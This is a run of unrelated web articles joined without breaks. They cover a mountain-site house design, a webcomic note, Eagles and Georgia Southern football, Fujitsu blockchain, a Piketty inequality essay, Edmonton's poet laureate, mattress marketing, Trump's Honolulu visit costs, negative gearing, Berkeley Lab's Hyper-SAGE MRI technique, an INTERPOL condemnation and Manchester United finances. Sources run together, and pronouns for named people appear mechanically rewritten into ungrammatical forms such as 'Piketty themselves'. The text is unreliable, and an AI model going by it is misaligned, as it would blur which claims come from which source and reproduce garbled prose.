The home responds to this dramatic site through a simple form – juxtaposed to the landscape while inspired by the fragmented granite boulders and mining equipment. A simple bar hovers above the slope, angled at the ends to address distant views and accept entry from the road, and shifted to allow views and movement through a breezeway at one end. The form is supported on slender steel columns and simple concrete shear walls, minimizing the impact of construction on the site while allowing the slope to flow under the house without interruption. In this way, the house preserves the landscape as it was found and intensifies the reading of the slope – allowing the mine pit and the boulders along the ridgeline to remain untouched.
Most of the glazing faces due south to maximize solar gain in a climate dominated by the need for heat, but blessed with a yearly abundance of sunshine. The south side has a deep overhang adjusted to welcome the sun in winter months while completely shading the interior on hot summer days. Consistent and efficient heating is powered by a geothermal heat pump drilled into the granite mountainside, and is coupled with a concrete floor to absorb energy from the sun. Spray foam insulation creates an airtight envelope, and an eight KW ground-mounted PV array supplies enough power to nearly offset all electricity use.
Materials were selected for their economy, function, beauty, and connection to the history of the site. The exterior is clad in the most economical and durable material possible, the same rusty corrugated steel as the nearby mine structures' cladding. Exterior decks and walls are covered with untreated Ipe, which will weather to a medium-grey color reminiscent of the weathered trunks of the burned trees surrounding the site. On the interior, all casework is clear vertical grain fir, reminiscent of the un-weathered interiors of the trees. The interior walls are pure white to capture the constantly changing colors of daylight against the landscape, and to create a seamless transition from inside to out.
Posted May 4, 2015 at 2:38 am
- NO BOOKSTORE
- Bookstore sighted
- Get into a zone
Ashley's zone out behavior in book stores is 100% based on real life behavior I have observed. In more than one person I've been friends with. All of whom have been women. Granted, the only friends I've had who have been interested in hanging out in bookstores or libraries have been women, and it's not like I was conducting a scientific study or anything.
That said, with one exception I can think of, 100% of women I've been friends with have been bookworms. I know rationally that not all women are into books, but I'd be lying if I said I wasn't a little sexist about expecting women to like books. It's one of those prejudices I try to dissuade with logic that lingers in my feelings regardless. A woman who doesn't like reading feels like an anomaly to me.
In any case, this real life inspiration made it feel very important to me to show Ashley sitting like that in full in panel three.
- EGS:NP
Just weeks before learning their Pro Football Hall of Fame fate, Brian Dawkins is starting one of the most important weeks of their post-football career with the Philadelphia Eagles.
Dawkins is in attendance with Eagles vice president of player personnel Joe Douglas at the Senior Bowl. Now a scout with the Eagles, Dawkins is playing a large role in deciding which players will be great fits on the Eagles roster for years to come.
#Eagles' Brian Dawkins, Joe Douglas writing down heights and weights at Senior Bowl weigh-in. pic.twitter.com/Mj0Gxv5dQk — Les Bowen (@LesBowen) January 24, 2017
The Philadelphia Eagles have a crucial offseason ahead of them as the franchise looks to return to the playoffs for the first time since 2013. Make sure to stay in the loop for all Eagles transactions this offseason -- take five seconds to sign up for our FREE Eagles newsletter now!
This offseason certainly is a different one for the Eagles than in years past. First with Douglas controlling the draft board and making the personnel decisions to Dawkins having a major input in helping Douglas make the right decision.
The Eagles are hoping this combination leads to better draft results than years past.
Based on the track record of Douglas as an executive and Dawkins as a player, they're headed in the right direction.
Japanese IT firm Fujitsu has developed a new blockchain-based system for securely exchanging data.
Announced on its corporate blog, the release is aimed at companies and organizations that want to exchange data safely but may not have a central hub for doing so. The system's unveiling comes months after Fujitsu debuted a blockchain product centered around secure document exchange.
Fujitsu is a member of the Linux Foundation-led Hyperledger blockchain consortium, and according to the firm, the system is based on the open-source Hyperledger Fabric.
Fujitsu said it will be holding a demonstration later this week at an event in Tokyo. The plan, the firm said, is to launch a commercial-scale version of the system later this year.
The blog post explained:
“Fujitsu will expand this software with the goal of commercializing it as part of the Fujitsu Network Virtuora series during fiscal [year] 2017. This will create data exchange networks where people can safely interchange their data across boundaries.”
In addition to its development of blockchain products, Fujitsu has helped other firms in Japan experiment with the tech. Last year, the company took part in a cross-border payments trial involving banking group Mizuho.
Image via Shutterstock
(Photo by Mark Davis/Getty Images for Coachella)
There's an old economic saying: a rising tide lifts all boats. Problem is, most people can't afford a boat.
Most people can't afford a lot of stocks, bonds, or real estate, either. But the few who can afford what economists call capital are racing even further ahead of the many who can't. It's what Nobel prize-winning economist Robert Solow calls the "rich-get-richer" principle, and it's how capitalism usually works.
We know this, because French economist Thomas Piketty has assembled hundreds of years worth of data on wealth and income inequality showing it. Their monumental, best-selling new book, "Capital in the Twenty-First Century, makes a startlingly simple argument: if the return on capital, r, is greater than the economy's growth rate, g, as it almost always has been, then inequality will tend to increase. That's because wealth grows faster than wages when r>g, and only the rich have much wealth to begin with.
Now, this dynamic won't make inequality increase forever; it will stop once the ratio of capital to income is the same as the ratio of savings to growth. But in the meantime, the top 1 percent will gobble up more and more wealth—and leave it to their kids.
Here's how we got here, and four things we can to do stop it from getting worse.
The decline and fall - and rise - of the rentiers
Periods of low income inequality, Piketty claims, are just a historical blip. Going back to the 1800s, the rate of return has typically been around 4 to 5 percent, and growth has been far less. Capital-income ratios were high then, so this r>g meant that wealth begat dynastic wealth.
But this, like everything else, changed with World War I. The fighting didn't just destroy a generation. It also destroyed capital—buildings, factories, and government bonds paid back in inflated currency—on a mass scale. Rentiers no longer had the income to support their aristocratic lifestyles, so they started spending down their remaining wealth to do so. Not only that, but countries were forced to resort to steep income taxes to finance their war efforts. Now, governments tried to return to economic normalcy in the 1920s, but the Great Depression and then World War II ended that. There was even more capital destruction. Even more confiscatory taxes. And even more regulation.
It was a bad time to be a rentier even after the war ended: r<g for the first and only time, as rent control, minimum wages, and taxes cut returns and postwar rebuilding boosted growth.
Then the Reagan-Thatcher revolution happened. Tax rates, inflation, and regulations were all cut, raising returns. But this second Gilded Age was different from the first, at least at the start. It wasn't about wealth growing faster than wages. It was about wages at the very top growing so fast that they were wealth. In other words, the owners of capital didn't cause our increasing income inequality. The managers of capital, the MBA class of CEOs and Wall Streeters, did. For now, at least. Today's "supermanagers," as Piketty calls them, will be tomorrow's rentiers. Just wait a generation, and we might be back to a world dominated by inherited wealth.
Or we might not. Piketty has demonstrated that the rate of return has historically been 4 to 5 percent, but they haven't demonstrated why. Without a theory to explain it, we can't really say if it will continue. Sure, the long-term trend—and it is long—could go on. But it could also be that, in the future, more capital will mean higher wages and lower returns. That the rate of return will fall more than growth.
But that's probably not a gamble we want to take. The IMF, hardly a bastion of populism, has found that high levels of inequality are correlated with slower growth, and redistribution, within reasonable limits, with faster and more durable growth. Income inequality has also been associated with life expectancy inequality, though, again, it's not clear which way the causation runs. And, perhaps most worryingly, concentrated economic power could turn into concentrated political power, entrenching economic power, in what Ezra Klein dubs a "doom loop of oligarchy." Actually, as my colleague Larry Bartels points out, that might already be here: studies show that the rich have 15 times more influence on policy as average people.
So what is to be done? Well, there are four basic strategies: increase growth, decrease pre-tax returns, decrease post-tax returns, or help the 99 percent do better in a r>g world.
1. Increase growth (first, by letting more people live here)
There are easy ways and then there are hard ways to increase growth. The easiest is just to let more people into the country. The calculus is simple: more workers means more GDP (which makes past wealth a smaller piece of the pie). Specifically, the CBO estimates that immigration reform would increase the size of the economy by 5.4 percent in 2033.
The other way to add people, of course, is to try to make life easier for parents, so they can work more and have more kids. That's not as easy, but it is doable—and it comes down to day care. Reihan Salam points out more mothers started working in Quebec after it introduced subsidized child care in 1997. And France, unlike most of its European peers, has pushed its birthrate back up near replacement level in large part because of its system of parental tax breaks and day-care centers (or "crèches").
The hard way to increase growth is to make our workers more productive—that is, to improve education. That could mean adopting Common Core standards. Or charter schools. Or school vouchers. Or vocational training. Or more—and smarter—college aid.
2. Less rent-seeking and more bargaining power for workers. And more houses.
Growth alone, though, won't be enough to save us from a plutocratic future if returns stay around 4 or 5 percent. We'll need to do more, need to cut those returns in some way. And we should start by going after the excessive returns hurting the economy.
Zoning probably isn't the first thing you think about when you think about rent-seeking, but it should be. NIMBY ("not-in-my-backyard") regulations—looking at you, San Francisco—prevent building where there's the most demand for it. The result is a policy-induced housing shortage in our cities that drives up prices and rents, and creates the kind of sprawl that keeps lower-income workers away from job opportunities. Piketty's best data on this comes from France, where things are even worse than they are here: housing rent as a share of national income has almost doubled there the past 30 years. Luckily, though, there's a simple enough way to cut these returns to housing: build more houses where people want them.
Drug and intellectual patents are another source of rent-seeking. Economist Dean Baker points out that these government-granted monopolies make up a sizable chunk of corporate profits, and are almost certainly too generous.
To take one example, Nexium costs $215 in the U.S., and just $23 in the Netherlands. Now, pharmaceutical and tech companies would say they need these temporary monopolies to give them an incentive to invest in R&D, but they might not be temporary enough. Nobel prize-winning economist Joseph Stiglitz thinks our patent laws might actually be hurting innovation by taking ideas out of the usable pool of knowledge for too long. So loosening patent protections wouldn't just make these outsized returns a bit less so; it might speed up growth, too.
Mega-profits aren't just about rent-seeking. They're also about the balance of power between capital and labor—which isn't so much a balance anymore as a war that capital has won. Indeed, the labor share of business income has fallen to a 60-year low during our not-so-great recovery. Part of that is due to big-picture trends like technology and globalization.
But part of it is due to policy. A higher minimum wage, for example, would, according to the CBO, raise aggregate incomes for households making less than $87,000 and lower them for households making more. That's because it would have a cascading effect on wages, raising them for middle-class workers too, which would eat into corporate profits. Making it easier to unionize could do the same.
3. It's time to tax inequality
But crony capitalism isn't causing r>g. Capitalism itself is. Cracking down on rent-seeking can help at the margins, but, if Piketty is right, we're going to have to do more to stop an inequality spiral.
And the absolute least we can do is beefing up the estate tax. France, again, has the best data here, going all the way back to the early 1800s. As you can see below, inheritance is making a slow-motion comeback there, up to 15 percent of national income from a postwar low of 4 percent.
It probably isn't this high in the U.S., because of our population growth—but give it time. Today's supermanagers will have tomorrow's trust-funders, and so on, and so on. Unless we start taxing estates more. That should include getting rid of the step-up basis in capital gains, which saves heirs from taxes that their parents would have had to pay. The Committee for A Responsible Federal Budget estimates that this tax break will cost the government about $50 billion a year in revenue through 2017.
Piketty, of course, wants a global tax on net wealth—that is, subtracting mortgages and any other debts. Their admittedly utopian plan would have three tax brackets: 0 percent for households with less than €1 million ($1.39 million) of net wealth, 1 percent for households with between $1.39 million and $6.95 million, and 2 percent for households above that. The virtue of such a system is it would be a tax on idle capital more than invested capital, since it hits both equally. The vice, other than the impracticality of getting governments to cooperate on it, is that it would incentivize going into debt to reduce your tax liability.
More realistically, we could just increase marginal tax rates. Piketty and Nobel prize-winning economist Peter Diamond have said that a top rate as high as 73 percent could be "optimal," because high-earners don't get as much benefit from an extra dollar as low-earners do. The question, though, is how much that would hurt growth. It's possible that high-earners would respond by working less; if not "going Galt," at least going on vacation. But it's also possible that it wouldn't have much effect. So many high-paying jobs have become winner-take-all that there's still a strong incentive to work long hours even if taxes go up.
4. Capital for the rest of us: the 99 percent need to own more stock
If r really is greater than g, now and forever, it's a powerful argument for helping the 99 percent own more stock. Arpit Gupta frames this as an argument for Social Security privatization, in particular, but I don't think that's right. It's not just that transitioning to private accounts would be costly. Or that it would introduce timing risk—of retiring during a market meltdown. It's that we don't know if Piketty is right about the future, so we shouldn't plan our pension system around it. But we should insure against the possibility. That could mean expanding Social Security with a general pool that invests in stocks—basically a sovereign wealth fund—and then makes guaranteed payouts. In fact, Piketty themselves proposed something like that in France a few years ago.
***
Past doesn't have to be prologue. The logic of r>g pushes us towards greater inequality, but we can push back. We don't know how hard we'll have to push, but we should get ready to.
Otherwise, if you want a picture of the future, imagine Paris Hilton's stiletto-heeled boot stamping on a human face—forever.
Ahmed Ali has been named Edmonton's new poet laureate to represent the city's literary community until 2019.
Ali, 33, came to Edmonton in 1992 as a refugee from Somalia and has been involved in the spoken-word poetry scene ever since.
"Edmonton is the first place where I touched ground, so it has a place in my heart," they said Tuesday.
Tasked with representing the literary arts community, the poet laureate has a busy two-year mandate. Those in the role are expected to produce at least three original works a year, perform at city events and advocate for the city's literary arts.
Ali was nominated by a former poet laureate and members of the Somali community for their work with to Breathe In Poetry Collective, a group of artists and community organizers working to expand Edmonton's spoken-word poetry scene. Ali founded the group in 2009 after returning from a stint in Toronto.
The Edmonton Arts Council's selection committee ultimately chooses the poet laureate.
"He recited a poem that made a lot of us laugh and cheer on the selection committee," said council spokesperson Jenna Turner.
"With their unique poetry style, I think he'll be able to tell the stories of this city."
According to city spokesperson Melissa Lovatt, each poet laureate is encouraged to "make the position their own."
For Ali, this could mean creating a poetry exchange between British and Canadian artists, they said. They also hope to connect literary festivals with poets looking to get published.
School board run
Ali also announced their candidacy for Edmonton Public Schools trustee on Tuesday, generating some backlash on social media due to the timing of the announcement.
When asked about the decision, Ali said they did a soft launch of their campaign Monday night based on the advice they were given by their public relations team.
Ali is the city's seventh poet laureate. They take over the position from bilingual poet, performer and playwright Pierrette Requier.
anna.desmarais@cbc.ca
@anna_desmarais
The transition into the FBS is over for the Georgia Southern Eagles. Conference title? Check. Back-to-back nine-win seasons? Check. First bowl win? Check.
Now it's time to see if new head coach Tyson Summers can carry on what was built by Jeff Monken and Willie Fritz over the last three years.
This is a tough team to preview because of the new coaching staff. We'll know infinitely more about this team just a month from now and much of what's written here will self-destruct once we all see the product on the field.
We know the talent is there, it's just a matter of utilizing it to its full potential. First up, let's look at last year.
2015 Recap: The Eagles took a baby step back between 2014 and 2015. The win total was the same both years (9), but the number in the loss column jumped from three to four and to qualify of those losses went down.
In 2014 there were last-gasp defeats to NC State and Georgia Tech, plus a blowout loss to a good Navy team. 2015? Big losses to West Virginia and App State, a very respectable defeat to Georgia and perhaps the worst loss in school history to cap off the regular season.
Thank God for the bowl game.
Georgia Southern beat down the Bowling Green Falcons in an epic come-from-behind victory, led by an out-of-body experience from quarterback Favian Upshaw. It was the third year in a row GS ended the season on a euphoric note, and it left Eagle Nation smiling as the calendar rolled into 2016.
2015 Record: 9-4
2016 Schedule:
Sept. 3 - vs. Savannah State
Sept. 10 - @ South Alabama
Sept. 17 - vs. UL Monroe
Sept. 24 - @ Western Michigan
Oct. 5 - @ Arkansas State
Oct. 15 - @ Georgia Tech
Oct. 22 - @ New Mexico State
Oct. 27 - vs. Appalachian State
Nov. 5 - @ Ole Miss
Nov. 10 - vs. UL Lafayette
Nov. 19 - @ Georgia State
Dec. 3 - @ Troy
Preseason 2016 FPI Ranking: No. 86
Offensive Outlook:
Haisten: Ah yes, the big question every time a new coach pulls into Statesboro. What'cha doin' with the offense, coach? Tyson Summers was in town for the He-Who-Shall-Not-Be-Named disaster in 2006, and they got the question out of the way at their opening press conference:
The option is here to stay and it will be run out of the gun.
However, their co-offensive coordinators, former Valdosta State head coach David Dean and former Valdosta high school coach Rance Gillespie, both have more of a passing background than Eagle fans are used to.
Make no mistake, a passing offense is needed, or at least the threat of it. Southern had 10 interceptions through the air to four touchdowns last year. Just 43 percent of pass attempts were completed. Selling out to stop the run wasn't a bold strategy against the Eagles, it was old hat.
A second dimension to the offense will make it deadly, and GS's two highest-rated recruits, Darion Anderson and Michael Jackson, were both wide receivers. Can they make a difference in year one? I hope so.
The running game is expected to continue its decades-old domination. Southern sports Matt Breida, LA Ramsby and Wesley Fields at running back, along with Kevin Ellison and Favian Upshaw at quarterback. Any of these five can do amazing things in the open field and I'm not even sure who I'd prefer because all of them are so good.
Last year's offense was boom and bust, playing lights out in the nine wins and stumbling in the dark through the four losses. The good news is the offensive line boasts more experience now, and virtually all of the skill position threats return.
Defensive Outlook:
Brian: The focal point of the season will be the progression of the defense under Summers. As I've mentioned before, the UCF defense of 2014 was an absolute monster when they served as defensive coordinator. It will be interesting to see how the GS defense looks coming out of summer practices, and how it produces throughout the season.
The line will presumably start three veterans in Jonathan Battle, Darrius Sapp and Bernard Dawson, who have seen significant playing time over the past few years. Incoming first-year student Traver Vliem was highly touted out of the state of Texas, and may see time as a rotational lineman getting their feet wet.
As far as the linebackers go, Antwione Williams is the only starter lost from a year ago, having been drafted to the Detroit Lions. Ironhead Gallon is listed as a linebacker on Georgia Southern's roster, and may be asked to fill the leadership role left open by Williams. Freshman Tori Delesline was a three-star recruit according to 24/7 Sports, and should get some experience this season.
The secondary is largely gone from a year ago, having to replace senior safeties Matt Dobson and D.J. White. Former head coach Willie Fritz's first (and only) real recruiting class prepared the Eagles for this, as safeties Jay Bowdry and Joshua Moon have great size for the position. At corner, Christian Matthew has been moved from their previously listed safety spot and has size you'd expect from a Seattle Seahawks cornerback (6'3”, 175 lbs). At this point, we have to assume that senior Darius Jones Jr. will start, as GS only lists two corners older than sophomore.
Again, we don't know what to expect from the defense this upcoming season, but with a new defensive-oriented head coach, the unit should make positive strides in 2016.
That Schedule Tho: Haisten: Southern's schedule is absolutely brutal. Only five games are at home, and only three of those are on a Saturday. This is more or less normal for a Group of Five programs, but it's the placement of those games that hurts.
After playing two of the first three in Statesboro, Southern will go 40 days between home games (UL Monroe Sept. 17 - App State Oct. 27). This means five of the first seven contests are on the road, including dates in Michigan, Alabama, Arkansas (on a Wednesday) and New Mexico.
When all of that ends, App State comes to town on a Thursday night just five days after the NMSU game. Tough stuff.
Prediction:
Brian: Let's get the OOC games out of the way first. There's very little chance the Eagles beat Ole Miss, obviously. A trip to Atlanta to take on Georgia Tech is a coin flip with the Yellow Jackets taking a major step back from the 2014 Orange Bowl victory. I say they beat GT in a shootout and avenge the loss from two years ago. I think the team defeats Western Michigan for the second season in a row, and Savannah State should be an easy W.
Inside conference play, the only two teams standing in the way of another Sun Belt championship for GS are Arkansas State and Appalachian State. With the way the games have worked out (home team wins) against App, I say we pick up the win at Our House. Arkansas St. is a different story. Their team has looked explosive for the past few seasons I've been watching them, and a Wednesday night in Jonesboro has the potential for an Eagles loss, unless the team shows it can be dominant defensively.
Season Prediction: 10-2 with losses on the road at Ole Miss and Arkansas State.
Haisten: I'm not quite as optimistic as Brian. The crazy schedule alone can turn a couple of would-be wins into losses. Western Michigan is rowing the boat harder and harder under P.J. Fleck. App State is coming off an 11-2 season and Southern traded Idaho and Texas State (easy wins) for Arkansas State and Louisiana-Lafayette (not so easy).
That said, we're Georgia Southern and winning is what we do. I say the Eagles finish 8-4, picking up a ninth win in the bowl game.
Shopping for a mattress in today's marketplace has never been more exciting. At the same time, it has never been more complicated. After all, there are now so many options to choose from. Knowing what mattress to select can be a very difficult decision. Below, we will be going over some of the top things that you should be looking for and considering when you are shopping for one.
Shopping For a Mattress:
1. Type of Casper Mattresses.
One of the first factors that you should look for when you are trying to find the right mattress to purchase would be the type of memory foam it uses. Ideally, you want to find the right type of memory foam that is going to provide you with the most comfortable experience possible. You will want to look at the different types and try them out in order to see which one works the best with your subjective taste. For instance, traditional memory foam is one of the oldest, but it also helps to decrease stress on your joints. Whereas, open-cell memory foam is much quicker to respond and it can help you disperse heat much better. Lastly, gel memory foam is capable of helping to reduce pressure on various pressure points scattered throughout your body and it is also effectively dispersing heat.
2. Material Makeup.
Whenever you are beginning to choose a memory foam mattress, you need to work on choosing the right material makeup. You want to find a mattress that is made up of all of the right materials that you want to find in a product. A lot of the mattresses available on the market combine a lot of different layers of materials that might be better suited for your body type or your comfort level. Thus, whenever you are shopping for your ideal mattress, you are going to want to keep in mind the different levels of comfort each material is going to be capable of providing. You want to look at the positives and negatives of each type and each specific mattress to make a good buying decision.
3. Casper Reviews.
You are going to want to pay close attention to the reviews that each mattress is getting from respective consumers. You want to find the mattresses that are getting the best reviews because it will help to ensure that you can find and choose the mattress that is going to be most likely to provide you with an exceptional sleeping experience. You can always find good deals online.
4. Budget.
You also want to factor your budget into the equation while you are looking to pick and choose which mattress to invest in. Some mattresses being offered by Casper might be completely out of your price range.
Overall, there is much to consider when it comes to picking and choosing the best mattress on the market.
HONOLULU (AP) - President Donald Trump's recent visit to Honolulu cost the city $140,776.
Trump and first lady Melania Trump arrived Nov. 3 and spent less than 24 hours on the island before departing for Asia, KHON2-TV reported Wednesday.
Various city departments worked with the U.S. Secret Service to ensure their safety. The Honolulu Police Department bore the largest share of overtime at more than $100,000.
That was followed by the Department of Facility Maintenance at more than $14,600, the Honolulu Fire Department at over $5,000 and the Department of Parks and Recreation at around $3,800.
The city also spent over $9,000 on third-party costs on traffic control devices such as concrete barriers.
Since the president's visit was not designated as a National Special Security Event by the U.S. Department of Homeland Security, the city does not expect to be reimbursed for the costs associated with the overnight visit.
Copyright © 2019 The Washington Times, LLC.
Negative gearing alert: The first rule of investing is to make a profit
Updated
The bottom line with negative gearing is that your investment is making a loss, and those banking on windfalls down the track are playing a risky game, writes Andrew Robertson.
And so the debate about negative gearing is heating up. Labor wants to rein it in and the Government is warning that will send house prices crashing.
But amidst the huffing and puffing in Canberra, one thing seems to be ignored. The first rule of investing is to make a profit on the investment. Tax breaks are secondary.
The bottom line with negative gearing is that your investment is making a loss. The income (rent) is not covering interest costs or the expenses of running the property.
Those losses are deductible against your income and you are looking to your tax return to cover as much of the gap as possible.
Of course, the tax deduction is bigger for those on higher marginal tax rates, so the overwhelming benefit from negative gearing goes to those on high incomes.
In a former life, Deakin University senior lecturer in financial planning, Dr Adrian Raftery was known as "Mr Taxman" and he's written many books on the subject.
They say people need to see negative gearing for what it really is.
"For example, you spend $10,000 and get back a maximum of $4900 back. It means that your bank account is $5100 worse off by going into the transaction (it gets worse for those on the 19 per cent tax bracket, the net outlay is $8100). That's negative gearing for you in a nutshell."
Sydney-based financial adviser, Suzanne Haddan, from BFG Financial Services, says, "it never ceases to amaze me when people congratulate me on their tax cheque."
"Tax cannot save poor investing."
Those who negatively gear are betting on a big capital gain when they sell the property to more than make up for the losses on the income side.
It's a dangerous strategy where the risks have been masked in an environment where, up till the last six months or so, house prices have been rising strongly.
"The only upside is that you are reliant on the property increasing in capital growth by an amount greater than your outlay - but remember to factor in capital gains tax and what you could have received if you simply had your money in the bank on term deposit," Dr Raftery said.
And they go further: "If a property market is stagnant, like we are experiencing in Australia with the growth years now behind us, then you will be falling behind. If the property market falls to levels like it has around the world in the past decade (30-50 per cent), then you are in a dire situation."
The other big risk with negative gearing is legislative risk.
If tax breaks are a primary reason for making an investment you are at the mercy of our politicians - one parliamentary vote away from financial disaster.
As we've already noted, if Labor wins the next election it's pledged to start winding back negative gearing for housing. Which means under Labor, if your investment property is not making a profit, you may lose your tax deduction as well.
In other words, you will be wearing all your losses.
Ms Haddan says people get caught up in the excitement of negative gearing and, like Dr Raftery, they think they ignore other investments which may be more beneficial.
"For many people, salary sacrificing more into superannuation will often beat negative gearing," they said.
For those considering negative gearing, Ms Haddan gives this advice: "There are a lot worse things in life than making a profit."
Sadly, they say the queues are often longest where the profits are lowest.
Andrew Robertson is the chief reporter for ABC's The Business.
Topics: government-and-politics, tax, business-economics-and-finance, housing-industry
First posted
Feature Story •
Reddit +1 Share 0 Shares
Contact: Lynn Yarris, (510) 486-5375, [email protected]
Hyper-SAGE can increase the strength of a remote MRI or NMR signal 10,000 times, making it possible to detect ultra-low concentrations of clinical and environmental targets.
A new technique in Magnetic Resonance Imaging dubbed “Hyper-SAGE” has the potential to detect ultra low concentrations of clincal targets, such as lung and other cancers. Development of Hyper-SAGE was led by one of the world's foremost authorities on MRI technology, Alexander Pines, a chemist who holds joint appointments with the Lawrence Berkeley National Laboratory (Berkeley Lab) and the University of California, Berkeley. The key to this technique is xenon gas that has been zapped with laser light to “hyperpolarize” the spins of its atomic nuclei so that most are pointing in the same direction.
“By detecting the MRI signal of dissolved hyperpolarized xenon after the xenon has been extracted back into the gas phase, we can boost the signal's strength up to 10,000 times,” Pines says. “It is absolutely amazing because we're looking at pure gas and can reconstruct the whole image of our target. With this degree of sensitivity, Hyper-SAGE becomes a highly promising tool for in vivo diagnostics and molecular imaging.”
MRI is a painless and radiation-free means of obtaining high quality three-dimensional tomographical images of internal tissue and organs. It is especially valuable for optically opaque samples, such as blood. However, the application of MRI to biomedical samples has been limited by sensitivity issues. For the past three decades, Pines has led an on-going effort to find ways of enhancing the sensitivity of MRI and its sister technology, nuclear magnetic resonance (NMR) spectroscopy. Hyper-SAGE, the latest development, represents a significant new advance for both technologies, according to Xin Zhou, a member of Pines' research group.
“Hyper-SAGE is a totally novel way to amplify a solvated xenon MRI/NMR signal in that instead of a chemical process, which is what previous signal enhancement techniques relied upon, it is a physical process,” says Zhou. “Because gas can be physically compressed, the density of information-carrying polarized gas in our detection chamber can be much greater than the density of an information-carrying solution. This means we can detect MRI signals from concentrations of molecules many thousands of times smaller than can be detected with conventional MRI.”
Zhou is the first author on a paper that is now available online in the Proceedings of the National Academy of Sciences (PNAS). The paper is entitled: “Hyperpolarized Xenon NMR and MRI Signal Amplification by Gas Extraction.” Co-authoring the paper with Zhou and Pines was Dominic Graziani. All hold joint appointments with Berkeley Lab's Materials Sciences Division and UC Berkeley's Chemistry Department, where Pines serve as the Glenn T. Seaborg Professor of Chemistry.
So Powerful and Yet so Weak
The great contradiction about MRI/NMR spectroscopy is that for being two of the most powerful tools we have today for studying the chemical composition and structure of a sample, they are based on a stunningly weak signal. Both depend upon atomic nuclei that have an unpaired proton or neutron. Such nuclei spin on an axis like miniature tops, giving rise to a magnetic moment – meaning the nuclei act like magnets with a north and south pole. When exposed to an external magnetic field, these spinning “bar magnets” attempt to align their axes along the lines of magnetic force. Since the alignment is not exact, the result is a wobbling rotation, or “precession,” that's unique to each type of atom.
If, while exposed to the magnetic field, the precessing nuclei are also hit with a radiofrequency pulse, they will absorb and re-emit energy at specific frequencies according to their rate of precession (NMR). When the rf pulse is combined with magnetic field gradients a spatially encoded signal is produced that can be detected and translated into three-dimensional images (MRI).
Obtaining an MRI signal from a sample depends upon the spins of its precessing nuclei being polarized so that an excess point either “up” or “down.” MRI's inherent weakness stems from the fact that the natural excess of up versus down spins for any typical population of atomic nuclei in a sample is only about one in 100,000. For this reason, conventional MRI techniques are designed to detect nuclei that are highly abundant in tissue, usually the protons in water. In addition, clinicians use contrasting agents to induce detectable changes in the MRI signal from a sample that can reveal the presence of anomalies. However, the sensitivity is usually too low for molecular imaging, which is needed in cancer detection, for example, where the earliest detections generally produce the most favorable outcomes.
Enter Hyper-SAGE
Pines and their research group have developed numerous ways of increasing the sensitivity of MRI technology and expanding its applicability. Previous work showed that xenon, an inert gas whose nuclei naturally feature a tiny degree of spin polarization, can be hyperpolarized with laser light to produce a population of xenon atoms in which nearly five out of every 10 nuclei – instead of one out of every 100,000 – produce an MRI signal. Pines and their group also showed that xenon can be incorporated into a biosensor and linked to specific proteins or other biological molecules to produce spatial images of a chosen molecular or cellular target.
The new technique, Hyper-SAGE, for “hyperpolarized xenon signal amplification by gas extraction,” offers other major advantages over conventional MRI/NMR techniques in addition to a signal that is up to 10,000 times stronger than previous signals, according to Zhou.
“Xenon gas has an intrinsically long relaxation time, greater than 45 minutes, which means the signal lasts long enough for us to collect all the encoded information, which in turn can enable us to detect specific targets, such as cancer-related proteins, at micromolar or parts per million concentrations,” they say. “Also, Hyper-SAGE utilizes remote detection, meaning the signal encoding and detection processes are physically separated and carried out independently. This is a plus for imaging the lung, for example, where the signal of interest would occupy only a small portion of the traditional MRI signal receiver.”
In their PNAS paper, Zhou, Graziani and Pines describe the successful testing of the Hyper-SAGE technique on a pair of membranes that mimicked the function of the lungs. Hyper-polarized xenon was dissolved in solution in one membrane to mimic inhalation, and was then extracted as a gas for detection from the other membrane to represent exhalation.
Explains Zhou, “In a clinical setting, a patient would inhale the hyperpolarized xenon gas which would be dissolved in the blood and allowed to flow into the body and brain. The exhaled xenon gas would then be collected and its MRI signal would be detected. Used in combination with a target-specific xenon biomolecular sensor, we should be able to study the gas-exchange in the lung and detect cancerous cells at their earliest stage of development.”
This research was supported by the U.S. Department of Energy's Office of Science, through its Basic Energy Sciences programs.
Berkeley Lab is a U.S. Department of Energy national laboratory located in Berkeley, California. It conducts unclassified scientific research for DOE's Office of Science and is managed by the University of California. Visit our Website at www.lbl.gov/
Additional Information
For more information about the research of Alexander Pines and their group, visit the Web at http://waugh.qb3.berkeley.edu/
INTERPOL condemns ‘cold-blooded and barbaric' murder of British hostage
Head of world police body proposes renaming terrorist group as ‘CM' for #CowardlyMurderers
LYON, France – On behalf of global law enforcement, INTERPOL Secretary General Ronald K. Noble has strongly condemned the murder of British aid volunteer Alan Henning at the hands of the group calling itself the ‘Islamic State'. They proposed it be renamed by the international community as ‘CM' for #CowardlyMurderers.
“The cruel murder of an innocent man who freely gave their time to assist the people of the very region where they met their death is a testament to the depravity of this terrorist group, which is seeking to create a reign of terror across the region,” said Secretary General Noble.
“I ask the global community: why should we allow a bloodthirsty group of terrorists to name themselves after a religion as a pretext to justify their heinous crimes that no religion would justify?
“I propose that the global community and law enforcement rename this group as ‘CM' for Cowardly Murderers. By doing this, we will remove their efforts to legitimize their crimes and put would-be foreign fighters on notice that if they join this group, then the world will see them as nothing more than cowardly murderers.
“Finally, let me stress that the cold-blooded and barbaric murder of Alan Henning only serves to harden the resolve of the global community to increase our efforts against the growing threat posed by militant terrorist groups, and bring those responsible for committing such atrocities to justice,” added the INTERPOL Chief.
Last week, the United Nations Security Council unanimously adopted Resolution 2178 recognizing the efforts of INTERPOL against the global threat posed by foreign terrorist fighters, highlighting the use of INTERPOL's I-24/7 secure police communications network, global databases and international notices system, in addition to its counter-terrorism efforts and procedures to track stolen or forged travel documents.
“As the UN Security Council decision makes clear, now is the time to act against this scourge of terrorism which threatens international security. We must intensify our collective efforts to exchange information and prevent the proliferation of foreign terrorist fighters,” said Secretary General Noble.
"We will not allow these cowardly terrorists to intimidate those of us who respect human life and the rule of law. Moreover, we will not allow these murderers to shield themselves behind their distortion of a religion,” concluded the INTERPOL Chief.
Manchester United executive chairperson Ed Woodward has said the club "expect to be challenging for trophies in all competitions" next season as they announced their latest financial results.
United saw a year-on-year drop of 17.7 percent in overall revenue in the club's quarterly statement up to March 31, 2015, as a result of the club's failure to qualify for Europe this season.
However, the club reported an improvement in commercial revenue of £47.8 million -- up 11.7 percent for the quarter -- with the club having signed a 10-year deal with adidas worth £750 million last year.
Woodward said in a club press release: "Our commercial revenues were up year over year and we are raising EBITDA guidance for fiscal year 2015 from £90-£95 million to £103-£110 million."
EBITDA -- earnings before interest, taxes, depreciation and amortization -- is related to operating profits and is the measure some companies use for their operating performance.
Ed Woodward praised Louis van Gaal's work as Manchester United manager this season.
Woodward also expressed optimism for next season, with United all but certain to have secured a return to the Champions League.
